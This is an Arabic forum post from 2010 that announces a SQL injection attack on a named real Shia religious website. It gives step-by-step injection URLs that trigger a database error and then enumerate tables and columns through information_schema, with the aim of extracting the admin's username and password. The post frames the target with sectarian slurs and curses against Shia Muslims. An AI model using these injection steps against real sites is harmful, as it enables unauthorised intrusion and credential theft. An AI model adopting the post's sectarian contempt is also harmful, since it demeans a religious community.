الموضوع
:
!! إستهداف موقع ارتباط الروافض الشيعه بالسستاني !!
عرض مشاركة واحدة
08-27-2010, 11:58 PM
رقم المشاركة :
1
(
permalink
)
معلومات العضو
DR.THMoORY
إحصائية العضو
إحصائية الترشيح
عدد النقاط :
10
!! إستهداف موقع ارتباط الروافض الشيعه بالسستاني !!
[align=center]السلام عليكم ورحمة الله وبركاته
إستهداف
موقع
ارتباط
الروافض
بالسستاني
لعنهم الله
الموقع المستهدف
www.najaf.org
نوع الثغره
sql injection
لكي نتاكد انو الموقع يحتوي عل خطئ في قاعدة البيانات
نقوم بعمل خطأ في قاعدة البيانات
http://www.najaf.org/mail/us_index.php?l=1
'
هع لدينا خطأ في القاعده
في الرقم الأول جيت اضفت
كود PHP:
http://www.najaf.org/mail/us_index.p...,2,3,4,5,6,7/*
بعد ان قمن باضافة الارقام اختفى الخطى وظهر الرقم 2
الآن نضيف هذا الاستثمار
كود PHP:
http://www.najaf.org/mail/us_index.p...chema.tables/*
اسماء الجداول في قاعدة بيانات الموقع
البحث في الجداول للحصول على يوزر و باس الادمن
وممكن نتوسع في الاستغلال والبركه في القراصنه
الان التنقل بين الاعمدة
كود PHP:
http://www.najaf.org/mail/us_index.p...chema.tables/*
العمود الموجود في التابل باسم
columns
جآري التلاعب والتنقل بهذا الاستثمار
كود PHP:
http://www.najaf.org/mail/us_index.p...hema.COLUMNs/*
الان الاستثمار والتنقل إلى العمود COLLATION
وهذا العمود مطلوب
كود PHP:
http://www.najaf.org/mail/us_index.p...a.COLLATIONs/*
[/align]
:a12:
المصدر:
:: vBspiders Professional Network ::
!! Ysji]ht l,ru hvjfh' hgv,htq hgadui fhgssjhkd
DR.THMoORY
مشاهدة ملفه الشخصي
إرسال رسالة خاصة إلى DR.THMoORY
البحث عن كل مشاركات DR.THMoORY